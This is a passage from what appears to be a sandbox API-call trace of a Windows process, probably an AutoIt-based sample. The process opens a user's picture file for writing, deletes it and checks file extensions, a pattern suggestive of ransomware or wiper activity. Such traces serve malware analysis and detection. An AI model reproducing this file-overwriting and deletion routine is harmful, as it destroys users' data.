lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.130] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.130] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.130] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.130] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.130] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0040.130] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.130] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\zfzfoo26_z1.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0040.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0040.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0040.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0040.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0040.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0040.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0040.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0040.131] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.131] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0040.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0040.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0040.131] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0040.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.131] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0040.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0040.131] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0040.131] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0040.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0040.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0040.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0040.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0040.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0040.131] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0040.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0040.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0040.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0040.132] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0040.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0040.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0040.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa) returned 0x88ce68 [0040.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x88ce68, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0040.132] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.132] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0040.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0040.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0040.132] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0040.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0040.132] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0040.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0040.132] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0040.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0040.133] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0040.133] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0040.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0040.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0040.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0040.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0040.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0040.133] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0040.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0040.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0040.133] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0040.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0040.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0040.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc40 [0040.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cc40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0040.133] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.133] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0040.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0040.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.134] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0040.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0040.134] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0040.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0040.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0040.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0040.134] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg", lpFilePart=0x0) returned 0x66 [0040.134] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x304524a0, ftCreationTime.dwHighDateTime=0x1d5bcc3, ftLastAccessTime.dwLowDateTime=0x6caaa870, ftLastAccessTime.dwHighDateTime=0x1d5be12, ftLastWriteTime.dwLowDateTime=0x17a1b660, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xdda0, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="ZFzFoo26_z1.jpg", cAlternateFileName="ZFZFOO~1.JPG")) returned 0x7c2240 [0040.134] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\zfzfoo26_z1.jpg")) returned 1 [0040.136] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x304524a0, ftCreationTime.dwHighDateTime=0x1d5bcc3, ftLastAccessTime.dwLowDateTime=0x6caaa870, ftLastAccessTime.dwHighDateTime=0x1d5be12, ftLastWriteTime.dwLowDateTime=0x17a1b660, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xdda0, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="ZFzFoo26_z1.jpg", cAlternateFileName="ZFZFOO~1.JPG")) returned 0 [0040.136] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0040.136] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.138] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0040.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0040.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0040.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0040.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0040.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0040.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0040.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0040.138] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0040.138] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0040.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0040.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0040.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0040.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0040.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0040.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0040.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0040.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0040.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.139] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0040.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0040.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.139] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0040.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0040.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0040.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0040.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0040.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0040.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0040.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0040.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0040.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0040.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0040.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0040.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0040.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0040.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0040.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0040.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0040.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0040.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0040.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0040.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0040.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0040.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0040.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0040.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0040.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0040.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0040.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0040.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0040.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0040.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0040.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0040.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0040.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0040.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.140] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0040.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0040.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0040.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0040.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0040.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0040.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0040.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0040.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0040.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0040.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0040.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0040.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd0) returned 0x791268 [0040.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0040.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0040.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0040.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0040.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0040.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0040.141] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0040.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0040.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0040.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0040.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0040.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0040.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0040.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0040.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0040.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0040.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0040.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 